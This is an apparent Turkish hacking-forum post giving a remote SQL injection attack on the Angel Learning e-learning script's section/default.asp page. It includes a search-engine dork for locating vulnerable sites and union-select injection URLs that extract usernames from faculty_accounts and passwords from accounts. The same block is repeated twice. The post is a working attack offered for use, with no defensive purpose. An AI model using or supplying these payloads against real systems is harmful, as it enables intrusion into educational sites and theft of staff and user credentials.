MySouLNeedLove
New member
Angel Learning scriptindeki SQL Injection güvenlik açığı ile SQL’i en basite indirceğiz
Yöntem : Remote SQL Injection
Hasarlı dosya : section/default.asp
Mantık : Soru / cevap
Aranılacak Metin :
intext:"2006 angel learning, inc" -pdf
Saldırının kullanım şekli
http://örneksiteadresi.com/Angel Scriptinin Yolu/section/default.asp?id=’%20union%20select%20top%201%20username%20from%20faculty_accounts--"
Veya
http://örneksiteadresi.com/Angel Scriptinin Yolu/section/default.asp?id=’%20union%20select%20top%201%20password%20from%20accounts--"
Yöntem : Remote SQL Injection
Hasarlı dosya : section/default.asp
Mantık : Soru / cevap
Aranılacak Metin :
intext:"2006 angel learning, inc" -pdf
Saldırının kullanım şekli
http://örneksiteadresi.com/Angel Scriptinin Yolu/section/default.asp?id=’%20union%20select%20top%201%20username%20from%20faculty_accounts--"
Veya
http://örneksiteadresi.com/Angel Scriptinin Yolu/section/default.asp?id=’%20union%20select%20top%201%20password%20from%20accounts--"